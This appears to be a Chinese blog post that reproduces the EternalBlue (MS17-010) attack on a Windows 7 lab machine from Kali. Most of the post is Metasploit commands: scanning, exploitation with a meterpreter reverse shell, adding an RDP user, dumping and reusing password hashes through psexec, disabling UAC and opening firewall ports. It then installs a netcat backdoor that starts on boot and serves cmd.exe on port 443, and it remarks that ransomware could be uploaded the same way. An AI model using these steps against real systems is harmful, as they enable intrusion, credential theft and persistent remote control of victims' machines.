zoukankan      html  css  js  c++  java
  • 永恒之蓝漏洞复现及留下隐藏后门nc及关闭主机防护开启后门

    题记

            近期我打算把我脑子里面想了很久的需要实战的东西都完成一遍,所以频率会非常高,活到老,学到老。时间是检验真理的唯一标准。

    环境

            机器:kali(192.168.0.119)、win7(192.168.0.126)

            Ctrl+shift+t在kali打开2个窗口。

    一、探测目标是否存在此漏洞

    1、使用探测模块探测。

            use auxiliary/scanner/smb/smb_ms17_010

            set RHOSTS 192.168.0.126

            exploit

            可以看到目标主机存在此漏洞。

    二、漏洞利用

    1、使用攻击模块

    use exploit/windows/smb/ms17_010_eternalblue

    Show options

    2、瞄准目标

            set RHOSTS 192.168.0.126

            set payload windows/x64/meterpreter/reverse_tcp

            show options

    3、进行攻击并拿下

    set lhost 192.168.0.119

    exploit

    三、权限连接后留后门

    1、创建一个新用户来远程连接win7桌面。

            run post/windows/manage/enable_rdp

            run post/windows/manage/enable_rdp username=goddess password=123.com

    2、kali终端连接目标

            rdesktop 192.168.0.126

            然后就能用其他用户登录了。

    3、关闭主机防护开启后门

            Windows密码存放处:C:WindowsSystem32configSAM

            Linux密码存放处:vim /etc/shadow

    3.1Hashdump获取密码密文

            goddess:1003:aad3b435b51404eeaad3b435b51404ee:afffeba176210fad4628f0524bfe1942:::

    3.2创建防火墙规则

            Shell

            netsh firewall add portopening TCP 4444 "goddess" enable all

            exit退出

            background把权限放到后台

    3.3使用hash值登录系统(遇到不会的就开show options看缺什么)

            use exploit/windows/smb/psexec

            set payload windows/meterpreter/reverse_tcp

            set rhosts 192.168.0.126

            set lhost 192.168.0.119

            set SMBUser goddess

            set SMBPass aad3b435b51404eeaad3b435b51404ee:afffeba176210fad4628f0524bfe1942

            set SMBDomain WORKGROUP

            exploit

    4、meterpreter > getuid

    5、下面我们配置一个后门程序,修改 UAC 的注册表,需要重启才能生效。

            Shell

            C:WindowsSystem32>cmd.exe /k %windir%System32 eg.exe ADD HKLMSOFTWAREMicrosoftWindowsCurrentVersionPoliciesSystem /v EnableLUA /t REG_DWORD /d 0 /f

            重启前留个后门。

            upload /usr/share/windows-binaries/nc.exe C:\windows\system32

            reg setval -k HKLM\software\microsoft\windows\currentversion\run -v lltest_nc -d 'C:windowssystem32 c.exe -Ldp 443 -e cmd.exe' 开机自启,监听端口为443

            shell

            防火墙允许 443 端口访问网络否则开机的时需要用户点击允许访问网络才可以成功执行。

            C:Windowssystem32> netsh firewall add portopening TCP 443 "goddess" ENABLE ALL 重启

            shutdown -r -f -t 0

            重启后用户登录可以看到443开启了

            Kali使用nc监听:nc -v 192.168.0.126 443

            或者

    6、扩展

            可以像传nc一样上传勒索病毒。

  • 相关阅读:
    poi生成excel整理(设置边框/字体/颜色/加粗/居中/)
    java里poi操作Excel工具类【我改】
    java里poi操作excel的工具类(兼容各版本)
    在java poi导入Excel通用工具类示例详解
    layui给select下拉框赋值
    Unity3d开发wp8问题汇总
    Unity3D WP8发布解决方案名 DefaultPackageName 修改问题
    微软发布WP SDK8.0 新增语音、应用内支付等原生API
    unity3d android互调
    解决unity3d发布的网页游戏放到服务器上无法使用的问题
  • 原文地址:https://www.cnblogs.com/sunny11/p/14082618.html
Copyright © 2011-2022 走看看